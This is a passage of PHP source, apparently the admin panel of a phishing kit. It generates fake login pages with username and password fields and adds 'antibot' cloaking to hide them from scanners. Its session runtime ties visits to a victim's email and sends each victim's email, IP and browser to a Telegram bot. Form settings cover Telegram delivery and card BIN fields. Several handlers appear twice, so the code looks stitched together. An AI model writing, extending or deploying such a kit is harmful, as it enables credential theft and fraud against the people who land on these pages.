        if (json_last_error() !== JSON_ERROR_NONE || !is_array($payload)) { http_response_code(400); echo json_encode(['ok'=>0,'err'=>'Invalid JSON']); exit; }
        backup_settings($SETTINGS_FILE, $BACKUP_DIR);
        @file_put_contents($SETTINGS_FILE, json_encode($payload, JSON_PRETTY_PRINT|JSON_UNESCAPED_UNICODE), LOCK_EX);
        echo json_encode(['ok'=>1]); exit;
    }

    if (isset($_GET['save_section'])) {
        header('Content-Type: application/json; charset=utf-8');
        $section = $_GET['save_section'];
        $payload = json_decode(file_get_contents('php://input'), true);
        $allowed = ['telegram','forms','pages','antibot','aes','session'];
        if (!in_array($section, $allowed, true)) { echo json_encode(['ok'=>0,'err'=>'Bad section']); exit; }
        if (!is_array($payload)) { echo json_encode(['ok'=>0,'err'=>'Invalid payload']); exit; }
        $s = load_settings($SETTINGS_FILE);
        backup_settings($SETTINGS_FILE, $BACKUP_DIR);
        $s[$section] = $payload;
        $s['__rev'] = time();
        save_settings($SETTINGS_FILE, $s);
        if($section==='antibot'){ build_antibot_runtime_and_js($s); }
        echo json_encode(['ok'=>1]); exit;
    }

    /* Save page file (Editor modal) */
    if (isset($_GET['save_page_file'])) {
        header('Content-Type: application/json; charset=utf-8');
        $file = basename($_POST['filename'] ?? '');
        $html = $_POST['html'] ?? '';
        if (!$file) { echo json_encode(['ok'=>0,'err'=>'Missing filename']); exit; }
        if (!preg_match('/^page_[A-Za-z0-9]{8}\.php$/', $file)) { echo json_encode(['ok'=>0,'err'=>'Invalid filename']); exit; }
        $path = $PAGES_DIR . $file;
        if (!file_exists($path)) { echo json_encode(['ok'=>0,'err'=>'File not found']); exit; }
        @copy($path, $BACKUP_DIR."/{$file}.".date('Ymd_His').".bak");
        $ok = @file_put_contents($path, $html, LOCK_EX);
        if ($ok===false) { echo json_encode(['ok'=>0,'err'=>'Write error (permissions?)']); exit; }
        echo json_encode(['ok'=>1]); exit;
    }

    /* Delete page (by index) */
    if (isset($_GET['delete_page'])) {
        header('Content-Type: application/json; charset=utf-8');

        $idx = isset($_POST['index']) ? (int)$_POST['index'] : -1;

        $s = load_settings($SETTINGS_FILE);
        if (!isset($s['pages']) || !is_array($s['pages'])) {
            echo json_encode(['ok'=>0,'err'=>'No pages array']); exit;
        }
        if ($idx < 0 || $idx >= count($s['pages'])) {
            echo json_encode(['ok'=>0,'err'=>'Bad index']); exit;
        }

        // امسك الصفحة والملف
        $page = $s['pages'][$idx];
        $phpFile = isset($page['php']) ? basename($page['php']) : '';
        $full = $phpFile ? ($PAGES_DIR . $phpFile) : '';

        // احذف من settings أولًا
        array_splice($s['pages'], $idx, 1);
        $s['__rev'] = time();
        backup_settings($SETTINGS_FILE, $BACKUP_DIR);
        save_settings($SETTINGS_FILE, $s);

        // جرّب تحذف الملف من الديسك (مش لازم لو مافيش صلاحيات)
        $file_deleted = false;
        if ($phpFile && is_file($full)) {
            $file_deleted = @unlink($full);
        }

        echo json_encode(['ok'=>1,'file'=>$phpFile,'file_deleted'=>$file_deleted]); exit;
    }

    /* Forms ops (create/rename/delete) */
    if (isset($_GET['forms_ops'])) {
        header('Content-Type: application/json; charset=utf-8');
        $op = $_GET['forms_ops'] ?? '';
        $s  = load_settings($SETTINGS_FILE);

        if ($op === 'create') {
            $name = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['name'] ?? '');
            if (!$name) { echo json_encode(['ok'=>0,'err'=>'Bad name']); exit; }
            if (isset($s['forms'][$name])) { echo json_encode(['ok'=>0,'err'=>'Exists']); exit; }
            $s['forms'][$name] = [
                "fields"   => [],
                "behavior" => [
                    "label"=>"Submit","telegram"=>false,"redirect"=>"","alert"=>"","webhook"=>"","js"=>"",
                    "tg_template"=>"pipe","tg_meta"=>["ua"=>true,"time"=>true,"geo"=>false,"bin"=>false],
                    "tg_bin_field"=>"","tg_header"=>"|{form} {page} | #{tag}\n",
                    "button_class_target"=>"",
                    "button_selector"=>""
                ]
            ];
            backup_settings($SETTINGS_FILE, $BACKUP_DIR);
            save_settings($SETTINGS_FILE, $s);
            echo json_encode(['ok'=>1]); exit;
        }

        if ($op === 'rename') {
            $old = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['old'] ?? '');
            $new = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['new'] ?? '');
            if (!$old || !$new || !isset($s['forms'][$old])) { echo json_encode(['ok'=>0,'err'=>'Bad form']); exit; }
            if (isset($s['forms'][$new])) { echo json_encode(['ok'=>0,'err'=>'Exists']); exit; }
            $s['forms'][$new] = $s['forms'][$old]; unset($s['forms'][$old]);
            backup_settings($SETTINGS_FILE, $BACKUP_DIR);
            save_settings($SETTINGS_FILE, $s);
            echo json_encode(['ok'=>1]); exit;
        }

        if ($op === 'delete') {
            $name = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['name'] ?? '');
            if (!$name || !isset($s['forms'][$name])) { echo json_encode(['ok'=>0,'err'=>'Bad form']); exit; }
            unset($s['forms'][$name]);
            if (isset($s['pages']) && is_array($s['pages'])) {
                foreach ($s['pages'] as $pi => $pg) {
                    if (!isset($pg['forms_on_page']) || !is_array($pg['forms_on_page'])) continue;
                    $new_list = array();
                    foreach ($pg['forms_on_page'] as $f) { if ($f !== $name) $new_list[] = $f; }
                    $s['pages'][$pi]['forms_on_page'] = array_values($new_list);
                }
            }
            backup_settings($SETTINGS_FILE, $BACKUP_DIR);
            $s['__rev'] = time();
            save_settings($SETTINGS_FILE, $s);
            echo json_encode(['ok'=>1]); exit;
        }
    }

    /* Build session runtime */
    if (isset($_GET['build_session'])) {
        header('Content-Type: application/json; charset=utf-8');
        // Build a hardened session_runtime.php (best-effort)
        $code = <<<'PHP'
<?php
/** Hardened session runtime (reads settings.json safely, no fatals) */
if (session_status() === PHP_SESSION_NONE) session_start();

/* ---- load config from settings.json ---- */
if (!function_exists('ua_cfg')) {
  function ua_cfg(){
    static $C=null; if($C!==null) return $C;
    $C = [
      'enabled'=>false,'duration'=>60,'lock_ip'=>true,
      'param'=>'email','redirect'=>'index.php','notify'=>false,
      'tpl'=>"🆕 New visit for {{email}}\n|SESSION    : #{{session_hash}}\n| + IP Info +\n|IP ADDRESS : {{ip}}\n|LOCATION   : {{location}}\n|BROWSER    : {{browser}}\n|TIME       : {{time_gmt}}",
      'bot'=>'','chat'=>''
    ];
    $p = __DIR__.'/settings.json';
    $j = @json_decode(@file_get_contents($p), true);
    if (is_array($j)){
      $s = $j['session']   ?? [];
      $t = $j['telegram']  ?? [];
      $C['enabled']   = !empty($s['enabled']);
      $C['duration']  = max(1,(int)($s['duration_minutes'] ?? 60));
      $C['lock_ip']   = !empty($s['lock_ip']);
      $C['param']     = (string)($s['require_param_name'] ?? 'email');
      $C['redirect']  = (string)($s['redirect_url'] ?? 'index.php');
      $C['notify']    = !empty($s['notify_new_visit']);
      $tpl            = (string)($s['visit_template'] ?? $C['tpl']);
      if (function_exists('mb_convert_encoding')) {
        $tpl = mb_convert_encoding($tpl, 'UTF-8', 'UTF-8,ISO-8859-1,Windows-1252');
      }
      $C['tpl']       = $tpl;
      $C['bot']       = (string)($t['bot_token'] ?? '');
      $C['chat']      = (string)($t['chat_id'] ?? '');
    }
    return $C;
  }
}

if (!function_exists('ua_browser')) {
  function ua_browser(){
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    if (stripos($ua,'Chrome')!==false && stripos($ua,'Edg')===false && stripos($ua,'OPR')===false) return 'Chrome';
    if (stripos($ua,'Safari')!==false && stripos($ua,'Chrome')===false) return 'Safari';
    if (stripos($ua,'Firefox')!==false) return 'Firefox';
    if (stripos($ua,'Edg')!==false) return 'Edge';
    if (stripos($ua,'OPR')!==false || stripos($ua,'Opera')!==false) return 'Opera';
    return 'Browser';
  }
}

if (!function_exists('ua_send_tg')) {
  function ua_send_tg($text){
    $cfg = ua_cfg(); if (!$cfg['bot'] || !$cfg['chat']) return;
    $payload = ['chat_id'=>$cfg['chat'], 'text'=>$text];
    $url = 'https://api.telegram.org/bot'.$cfg['bot'].'/sendMessage';

    if (function_exists('curl_init')) {
      $ch = curl_init($url);
      curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
        CURLOPT_POSTFIELDS => json_encode($payload),
        CURLOPT_CONNECTTIMEOUT => 4,
        CURLOPT_TIMEOUT => 6,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => 0,
      ]);
      @curl_exec($ch);
      @curl_close($ch);
      return;
    }
    $ctx = stream_context_create([
      'http'=>[
        'method'=>'POST',
        'header'=>"Content-Type: application/json\r\n",
        'content'=>json_encode($payload),
        'timeout'=>6
      ],
      'ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]
    ]);
    @file_get_contents($url,false,$ctx);
  }
}

/* ---- main runtime ---- */
$cfg = ua_cfg();
if ($cfg['enabled']) {
  $now = time();
  if (empty($_SESSION['ua_session'])) {
    $_SESSION['ua_session'] = [
      'hash'=>bin2hex(random_bytes(16)),
      'ip'  => $_SERVER['REMOTE_ADDR'] ?? '',
      'since'=>$now,
      'param'=>null,
      'visit_notified'=>false
    ];
  }
  // expiry
  if ($now - ($_SESSION['ua_session']['since'] ?? $now) > ($cfg['duration']*60)) {
    $_SESSION['ua_session'] = [
      'hash'=>bin2hex(random_bytes(16)),
      'ip'  => $_SERVER['REMOTE_ADDR'] ?? '',
      'since'=>$now,
      'param'=>null,
      'visit_notified'=>false
    ];
  }
  // lock by IP
  if ($cfg['lock_ip']) {
    $ip = $_SERVER['REMOTE_ADDR'] ?? '';
    if (!empty($_SESSION['ua_session']['ip']) && $_SESSION['ua_session']['ip'] !== $ip) {
      $_SESSION['ua_session']['ip'] = $ip;
      $_SESSION['ua_session']['param'] = null;
      $_SESSION['ua_session']['since'] = $now;
      $_SESSION['ua_session']['visit_notified'] = false;
    }
  }
  // require param
  if ($cfg['param']) {
    $val = $_SESSION['ua_session']['param'] ?? null;
    if ($val===null || $val==='') {
      $try = $_POST[$cfg['param']] ?? ($_GET[$cfg['param']] ?? '');
      if ($try==='') {
        if ($cfg['redirect']) { header('Location: '.$cfg['redirect']); exit; }
      } else {
        $_SESSION['ua_session']['param'] = (string)$try;
      }
    }
  }
  // new visit notify
  if ($cfg['notify'] && empty($_SESSION['ua_session']['visit_notified'])) {
    $email   = $_SESSION['ua_session']['param'] ?? '';
    $browser = ua_browser();
    $ip      = $_SERVER['REMOTE_ADDR'] ?? '';
    $when    = gmdate('d/m/Y h:i:sa').' GMT';
    $txt = strtr($cfg['tpl'], [
      '{{email}}'        => $email,
      '{{session_hash}}' => $_SESSION['ua_session']['hash'],
      '{{ip}}'           => $ip,
      '{{location}}'     => '-',
      '{{browser}}'      => $browser,
      '{{time_gmt}}'     => $when,
    ]);
    if (function_exists('mb_convert_encoding')) {
      $txt = mb_convert_encoding($txt, 'UTF-8', 'UTF-8,ISO-8859-1,Windows-1252');
    }
    try { ua_send_tg($txt); } catch (Throwable $e) { /* swallow */ }
    $_SESSION['ua_session']['visit_notified'] = true;
  }
}
PHP;
        $ok = @file_put_contents(__DIR__.'/session_runtime.php', $code, LOCK_EX);
        if ($ok === false) { echo json_encode(['ok'=>0,'err'=>'Write failed']); exit; }
        @chmod(__DIR__.'/session_runtime.php',0644);
        echo json_encode(['ok'=>1]); exit;
    }

    /* Create new page (POST) */
    if (isset($_GET['create_page'])) {
        header('Content-Type: application/json; charset=utf-8');

        $display = trim($_POST['display'] ?? '');
        if ($display === '') { $display = 'New page'; }

        $settings = load_settings($SETTINGS_FILE);
        $aes_enabled = !empty($settings['aes']['enabled']);

        $rand = substr(md5(mt_rand()), 0, 8);
        $filename = sanitize_filename("page_{$rand}.php");
        $path = $PAGES_DIR . $filename;

        $php_header = "";
        if ($aes_enabled) {
            $php_header .= "<?php define('UA_AES_AUTO',1); @include __DIR__.'/aes_runtime.php'; ?>\n";
        }
        // always include antibot runtime at top for consistent protection
        $php_header .= "<?php @include __DIR__.'/antibot_runtime.php'; ?>\n";

        // Page starter template
        $starter = $php_header .
"<!doctype html>
<html lang=\"en\">
<head>
<meta charset=\"utf-8\">
<meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">
<title>".htmlspecialchars($display,ENT_QUOTES,'UTF-8')."</title>
<link href=\"https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css\" rel=\"stylesheet\">
<style>.ua-invalid{outline:0;border-color:#ef4444!important;box-shadow:0 0 0 .2rem rgba(239,68,68,.15)!important}.ua-error{color:#ef4444;font-size:.85rem;margin-top:.35rem;display:none}</style>
</head>
<body>
<div class=\"container my-5\" data-form-root data-ua-form=\"\" data-ua-fields=\"\">
  <h3 class=\"mb-4\">".htmlspecialchars($display,ENT_QUOTES,'UTF-8')."</h3>
  <div class=\"mb-3\">
    <label class=\"form-label\">Username</label>
    <input class=\"form-control username\" placeholder=\"\">
  </div>
  <div class=\"mb-3\">
    <label class=\"form-label\">Password</label>
    <div class=\"input-group\">
      <input type=\"password\" class=\"form-control password\" placeholder=\"\">
      <button class=\"btn btn-outline-secondary show-btn\" type=\"button\">Show</button>
    </div>
  </div>
  <button class=\"btn btn-primary submit-btn\" data-ua-form=\"\">Login</button>
</div>
<script src=\"admin.php?asset=render.js\" defer></script>
<script src=\"antibot.js\" defer></script>
<script src=\"https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js\" defer></script>
</body>
</html>";

        if (@file_put_contents($path, $starter, LOCK_EX) === false) {
            echo json_encode(['ok'=>0,'err'=>'Write failed (permissions?)']); exit;
        }
        @chmod($path, 0644);

        $settings['pages'] = is_array($settings['pages'] ?? null) ? $settings['pages'] : [];
        $settings['pages'][] = [ "display" => $display, "php" => $filename, "forms_on_page" => [] ];
        $settings['__rev'] = time();
        backup_settings($SETTINGS_FILE, $BACKUP_DIR);
        save_settings($SETTINGS_FILE, $settings);

        if (!file_exists(__DIR__.'/antibot.js') || !file_exists(__DIR__.'/antibot_runtime.php')) {
            build_antibot_runtime_and_js($settings);
        }

        echo json_encode(['ok'=>1,'php'=>$filename,'display'=>$display]); exit;
    }

} // end POST handlers

// (The rest of the file — view HTML and admin UI — follows in your original file)


/* ===== Build Session Runtime (hardened, reads settings.json at runtime) ===== */
if (isset($_GET['build_session'])) {
  header('Content-Type: application/json; charset=utf-8');

  $code = <<<'PHP'
<?php
/** Hardened session runtime (reads settings.json safely, no fatals) */
if (session_status() === PHP_SESSION_NONE) session_start();

/* ---- load config from settings.json ---- */
function ua_cfg(){
  static $C=null; if($C!==null) return $C;
  $C = [
    'enabled'=>false,'duration'=>60,'lock_ip'=>true,
    'param'=>'email','redirect'=>'index.php','notify'=>false,'tpl'=>"🆕 New visit for {{email}}\n|SESSION    : #{{session_hash}}\n| + IP Info +\n|IP ADDRESS : {{ip}}\n|LOCATION   : {{location}}\n|BROWSER    : {{browser}}\n|TIME       : {{time_gmt}}",
    'bot'=>'','chat'=>''
  ];
  $p = __DIR__.'/settings.json';
  $j = @json_decode(@file_get_contents($p), true);
  if (is_array($j)){
    $s = $j['session']   ?? [];
    $t = $j['telegram']  ?? [];
    $C['enabled']   = !empty($s['enabled']);
    $C['duration']  = max(1,(int)($s['duration_minutes'] ?? 60));
    $C['lock_ip']   = !empty($s['lock_ip']);
    $C['param']     = (string)($s['require_param_name'] ?? 'email');
    $C['redirect']  = (string)($s['redirect_url'] ?? 'index.php');
    $C['notify']    = !empty($s['notify_new_visit']);
    // UTF-8 template to avoid encoding issues
    $tpl            = (string)($s['visit_template'] ?? $C['tpl']);
    if (function_exists('mb_convert_encoding')) {
      $tpl = mb_convert_encoding($tpl, 'UTF-8', 'UTF-8,ISO-8859-1,Windows-1252');
    }
    $C['tpl']       = $tpl;
    $C['bot']       = (string)($t['bot_token'] ?? '');
    $C['chat']      = (string)($t['chat_id'] ?? '');
  }
  return $C;
}

/* ---- helpers ---- */
function ua_browser(){
  $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
  if (stripos($ua,'Chrome')!==false && stripos($ua,'Edg')===false && stripos($ua,'OPR')===false) return 'Chrome';
  if (stripos($ua,'Safari')!==false && stripos($ua,'Chrome')===false) return 'Safari';
  if (stripos($ua,'Firefox')!==false) return 'Firefox';
  if (stripos($ua,'Edg')!==false) return 'Edge';
  if (stripos($ua,'OPR')!==false || stripos($ua,'Opera')!==false) return 'Opera';
  return 'Browser';
}
function ua_send_tg($text){
  $cfg = ua_cfg(); if (!$cfg['bot'] || !$cfg['chat']) return;
  $payload = ['chat_id'=>$cfg['chat'], 'text'=>$text];
  $url = 'https://api.telegram.org/bot'.$cfg['bot'].'/sendMessage';

  // Prefer cURL if available
  if (function_exists('curl_init')) {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
      CURLOPT_RETURNTRANSFER => true,
      CURLOPT_POST => true,
      CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
      CURLOPT_POSTFIELDS => json_encode($payload),
      CURLOPT_CONNECTTIMEOUT => 4,
      CURLOPT_TIMEOUT => 6,
      CURLOPT_SSL_VERIFYPEER => false,
      CURLOPT_SSL_VERIFYHOST => 0,
    ]);
    @curl_exec($ch);
    @curl_close($ch);
    return;
  }
  // Fallback to file_get_contents safely
  $ctx = stream_context_create([
    'http'=>[
      'method'=>'POST',
      'header'=>"Content-Type: application/json\r\n",
      'content'=>json_encode($payload),
      'timeout'=>6
    ],
    'ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]
  ]);
  @file_get_contents($url,false,$ctx);
}

/* ---- main runtime ---- */
$cfg = ua_cfg();
if ($cfg['enabled']) {
  $now = time();
  if (empty($_SESSION['ua_session'])) {
    $_SESSION['ua_session'] = [
      'hash'=>bin2hex(random_bytes(16)),
      'ip'  => $_SERVER['REMOTE_ADDR'] ?? '',
      'since'=>$now,
      'param'=>null,
      'visit_notified'=>false
    ];
  }
  // expiry
  if ($now - ($_SESSION['ua_session']['since'] ?? $now) > ($cfg['duration']*60)) {
    $_SESSION['ua_session'] = [
      'hash'=>bin2hex(random_bytes(16)),
      'ip'  => $_SERVER['REMOTE_ADDR'] ?? '',
      'since'=>$now,
      'param'=>null,
      'visit_notified'=>false
    ];
  }
  // lock by IP
  if ($cfg['lock_ip']) {
    $ip = $_SERVER['REMOTE_ADDR'] ?? '';
    if (!empty($_SESSION['ua_session']['ip']) && $_SESSION['ua_session']['ip'] !== $ip) {
      $_SESSION['ua_session']['ip'] = $ip;
      $_SESSION['ua_session']['param'] = null;
      $_SESSION['ua_session']['since'] = $now;
      $_SESSION['ua_session']['visit_notified'] = false;
    }
  }
  // require param
  if ($cfg['param']) {
    $val = $_SESSION['ua_session']['param'] ?? null;
    if ($val===null || $val==='') {
      $try = $_POST[$cfg['param']] ?? ($_GET[$cfg['param']] ?? '');
      if ($try==='') {
        if ($cfg['redirect']) { header('Location: '.$cfg['redirect']); exit; }
      } else {
        $_SESSION['ua_session']['param'] = (string)$try;
      }
    }
  }
  // new visit notify (best-effort, never fatal)
  if ($cfg['notify'] && empty($_SESSION['ua_session']['visit_notified'])) {
    $email   = $_SESSION['ua_session']['param'] ?? '';
    $browser = ua_browser();
    $ip      = $_SERVER['REMOTE_ADDR'] ?? '';
    $when    = gmdate('d/m/Y h:i:sa').' GMT';
    $txt = strtr($cfg['tpl'], [
      '{{email}}'        => $email,
      '{{session_hash}}' => $_SESSION['ua_session']['hash'],
      '{{ip}}'           => $ip,
      '{{location}}'     => '-',
      '{{browser}}'      => $browser,
      '{{time_gmt}}'     => $when,
    ]);
    if (function_exists('mb_convert_encoding')) {
      $txt = mb_convert_encoding($txt, 'UTF-8', 'UTF-8,ISO-8859-1,Windows-1252');
    }
    try { ua_send_tg($txt); } catch (Throwable $e) { /* swallow */ }
    $_SESSION['ua_session']['visit_notified'] = true;
  }
}
PHP;

  $ok = @file_put_contents(__DIR__.'/session_runtime.php', $code);
  if ($ok === false) { echo json_encode(['ok'=>0,'err'=>'Write failed']); exit; }
  @chmod(__DIR__.'/session_runtime.php',0644);
  echo json_encode(['ok'=>1]); exit;
}

/* Create new page (POST) */
if (isset($_GET['create_page'])) {
  header('Content-Type: application/json; charset=utf-8');

  $display = trim($_POST['display'] ?? '');
  if ($display === '') { $display = 'New page'; }

  $settings = load_settings($SETTINGS_FILE);
  $aes_enabled = !empty($settings['aes']['enabled']);

  $rand = substr(md5(mt_rand()), 0, 8);
  $filename = sanitize_filename("page_{$rand}.php");
  $path = $PAGES_DIR . $filename;

  $php_header = "";
  if ($aes_enabled) {
    $php_header .= "<?php define('UA_AES_AUTO',1); @include __DIR__.'/aes_runtime.php'; ?>\n";
  }
  // always include antibot runtime at top for consistent protection
  $php_header .= "<?php @include __DIR__.'/antibot_runtime.php'; ?>\n";

  // Page starter template
  // Important: include data-form-root and data-ua-form/data-ua-fields to scope render.js binding
  $starter = $php_header .
"<!doctype html>
<html lang=\"en\">
<head>
<meta charset=\"utf-8\">
<meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">
<title>".htmlspecialchars($display,ENT_QUOTES,'UTF-8')."</title>
<link href=\"https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css\" rel=\"stylesheet\">
<style>.ua-invalid{outline:0;border-color:#ef4444!important;box-shadow:0 0 0 .2rem rgba(239,68,68,.15)!important}.ua-error{color:#ef4444;font-size:.85rem;margin-top:.35rem;display:none}</style>
</head>
<body>
<div class=\"container my-5\" data-form-root data-ua-form=\"\" data-ua-fields=\"\">
  <h3 class=\"mb-4\">".htmlspecialchars($display,ENT_QUOTES,'UTF-8')."</h3>
  <div class=\"mb-3\">
    <label class=\"form-label\">Username</label>
    <input class=\"form-control username\" placeholder=\"\">
  </div>
  <div class=\"mb-3\">
    <label class=\"form-label\">Password</label>
    <div class=\"input-group\">
      <input type=\"password\" class=\"form-control password\" placeholder=\"\">
      <button class=\"btn btn-outline-secondary show-btn\" type=\"button\">Show</button>
    </div>
  </div>
  <button class=\"btn btn-primary submit-btn\" data-ua-form=\"\">Login</button>
</div>
<script src=\"admin.php?asset=render.js\" defer></script>
<script src=\"antibot.js\" defer></script>
<script src=\"https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js\" defer></script>
</body>
</html>";

  if (@file_put_contents($path, $starter) === false) {
    echo json_encode(['ok'=>0,'err'=>'Write failed (permissions?)']); exit;
  }

  $settings['pages'] = is_array($settings['pages'] ?? null) ? $settings['pages'] : [];
  $settings['pages'][] = [ "display" => $display, "php" => $filename, "forms_on_page" => [] ];
  $settings['__rev'] = time();
  backup_settings($SETTINGS_FILE, $BACKUP_DIR);
  save_settings($SETTINGS_FILE, $settings);

  if (!file_exists(__DIR__.'/antibot.js') || !file_exists(__DIR__.'/antibot_runtime.php')) {
    build_antibot_runtime_and_js($settings);
  }

  echo json_encode(['ok'=>1,'php'=>$filename,'display'=>$display]); exit;
}

/* Retrofit page — inject includes: Session(if enabled) + AES(if enabled) + AntiBot + guard + assets */
/* Retrofit page — prepend header block safely: Session(if enabled) + AES(if enabled) + AntiBot + Guard (direct-only) + Assets */
if (isset($_GET['retrofit_page'])) {
  header('Content-Type: application/json; charset=utf-8');

  $file = basename($_POST['filename'] ?? '');
  if (!preg_match('/^page_[a-z0-9]{8}\.php$/i', $file)) {
    echo json_encode(['ok'=>0,'err'=>'Bad filename']); exit;
  }

  $path = $PAGES_DIR . $file;
  if (!is_file($path)) { echo json_encode(['ok'=>0,'err'=>'Not found']); exit; }

  $src = @file_get_contents($path);
  if ($src === false) { echo json_encode(['ok'=>0,'err'=>'Read error']); exit; }

  // strip BOM
  if (substr($src, 0, 3) === "\xEF\xBB\xBF") $src = substr($src, 3);

  $settings        = load_settings($SETTINGS_FILE);
  $aes_enabled     = !empty($settings['aes']['enabled']);
  $session_enabled = !empty($settings['session']['enabled']);

  $origLen  = strlen($src);
  $out      = $src;
  $modified = false;

  // Markers (idempotent)
  $HDR_BEG   = "/* UA: HEADER BLOCK START */";
  $HDR_END   = "/* UA: HEADER BLOCK END */";

  // Only prepend once
  if (strpos($out, $HDR_BEG) === false) {
    $inc = [];
    if ($session_enabled) $inc[] = "@include __DIR__.'/session_runtime.php';";
    if ($aes_enabled)     $inc[] = "define('UA_AES_AUTO',1); @include __DIR__.'/aes_runtime.php';";
    $inc[] = "@include __DIR__.'/antibot_runtime.php';";
    $inc_stmt = implode("\n", $inc);

    // GUARD: يعمل فقط عند التنفيذ المباشر (وليس عند include من الراوتر)
    $guard = <<<'PHP'
/* UA: PAGE GUARD (direct access only) */
if (session_status() === PHP_SESSION_NONE) @session_start();
$__ua_is_direct = (isset($_SERVER['SCRIPT_FILENAME']) && realpath(__FILE__) === realpath($_SERVER['SCRIPT_FILENAME']));
if ($__ua_is_direct && !isset($_GET['pv'])) {
  $sid_ok = false;
  if (isset($_GET['sid'], $_GET['p']) && isset($_SESSION['ua_sid'])) {
    if (is_string($_GET['sid']) && $_GET['sid'] === $_SESSION['ua_sid']) $sid_ok = true;
  }
  if (!$sid_ok) {
    $sid = isset($_SESSION['ua_sid']) ? $_SESSION['ua_sid'] : '';
    header('Location: index.php?sid=' . urlencode($sid) . '&p=1');
    exit;
  }
}
unset($__ua_is_direct);
/* UA: PAGE GUARD END */
PHP;

    // Header block (prepend) — ما نلمسش محتوى الصفحة الأصلي
    $header = "<?php\n{$HDR_BEG}\n{$inc_stmt}\n{$guard}\n{$HDR_END}\n?>\n";

    $out = $header . $out;
    $modified = true;
  }

  // Inject assets idempotently (قبل </body> إن وُجد، وإلا في آخر الملف)
  $assets = [];
  if (strpos($out, 'admin.php?asset=render.js') === false)
    $assets[] = '<script src="admin.php?asset=render.js" defer></script>';
  if (strpos($out, 'antibot.js') === false)
    $assets[] = '<script src="antibot.js" defer></script>';

  if (!empty($assets)) {
    $inj = implode("\n", $assets) . "\n";
    if (preg_match('/<\/body>\s*<\/html>\s*$/i', $out)) {
      $out = preg_replace('/<\/body>\s*<\/html>\s*$/i', $inj . "</body>\n</html>", $out, 1);
    } else {
      $out .= "\n".$inj;
    }
    $modified = true;
  }

  if (!$modified) {
    echo json_encode(['ok'=>1,'modified'=>false,'msg'=>'No changes required','aes_enabled'=>$aes_enabled,'session_enabled'=>$session_enabled]); exit;
  }

  // Safety
  $newLen = strlen($out);
  if ($origLen > 0 && $newLen < max(128, (int)($origLen * 0.25))) {
    echo json_encode(['ok'=>0,'err'=>'Safety stop: output shrank too much','orig'=>$origLen,'new'=>$newLen]); exit;
  }

  // Backup then write
  @copy($path, $BACKUP_DIR . "/{$file}." . date('Ymd_His') . ".bak");

  $tmp = @tempnam(dirname($path), 'rtf_');
  if (!$tmp) { echo json_encode(['ok'=>0,'err'=>'Temp file error']); exit; }
  if (@file_put_contents($tmp, $out) === false) { @unlink($tmp); echo json_encode(['ok'=>0,'err'=>'Write temp failed']); exit; }
  @chmod($tmp, 0644);
  if (!@rename($tmp, $path)) { @unlink($tmp); echo json_encode(['ok'=>0,'err'=>'Rename failed']); exit; }

  if (!file_exists(__DIR__.'/antibot.js') || !file_exists(__DIR__.'/antibot_runtime.php')) {
    $s = load_settings($SETTINGS_FILE); build_antibot_runtime_and_js($s);
  }

  echo json_encode(['ok'=>1,'modified'=>true,'file'=>$file,'orig_bytes'=>$origLen,'new_bytes'=>$newLen,'aes_enabled'=>$aes_enabled,'session_enabled'=>$session_enabled]);
  exit;
}

/* ------- FORMS OPS ---------- */
if (isset($_GET['forms_ops'])) {
  header('Content-Type: application/json; charset=utf-8');
  $op = $_GET['forms_ops'] ?? '';
  $s  = load_settings($SETTINGS_FILE);

  if ($op === 'create') {
    $name = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['name'] ?? '');
    if (!$name) { echo json_encode(['ok'=>0,'err'=>'Bad name']); exit; }
    if (isset($s['forms'][$name])) { echo json_encode(['ok'=>0,'err'=>'Exists']); exit; }
    $s['forms'][$name] = [
      "fields"   => [],
      "behavior" => [
        "label"=>"Submit","telegram"=>false,"redirect"=>"","alert"=>"","webhook"=>"","js"=>"",
        "tg_template"=>"pipe","tg_meta"=>["ua"=>true,"time"=>true,"geo"=>false,"bin"=>false],
        "tg_bin_field"=>"","tg_header"=>"|{form} {page} | #{tag}\n",
        "button_class_target"=>"",
        "button_selector"=>""
      ]
    ];
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    save_settings($SETTINGS_FILE, $s);
    echo json_encode(['ok'=>1]); exit;
  }

  if ($op === 'rename') {
    $old = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['old'] ?? '');
    $new = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['new'] ?? '');
    if (!$old || !$new || !isset($s['forms'][$old])) { echo json_encode(['ok'=>0,'err'=>'Bad form']); exit; }
    if (isset($s['forms'][$new])) { echo json_encode(['ok'=>0,'err'=>'Exists']); exit; }
    $s['forms'][$new] = $s['forms'][$old]; unset($s['forms'][$old]);
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    save_settings($SETTINGS_FILE, $s);
    echo json_encode(['ok'=>1]); exit;
  }

  if ($op === 'delete') {
    $name = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['name'] ?? '');
    if (!$name || !isset($s['forms'][$name])) { echo json_encode(['ok'=>0,'err'=>'Bad form']); exit; }

    unset($s['forms'][$name]);

    if (isset($s['pages']) && is_array($s['pages'])) {
      foreach ($s['pages'] as $pi => $pg) {
        if (!isset($pg['forms_on_page']) || !is_array($pg['forms_on_page'])) continue;
        $new_list = array();
        foreach ($pg['forms_on_page'] as $f) { if ($f !== $name) $new_list[] = $f; }
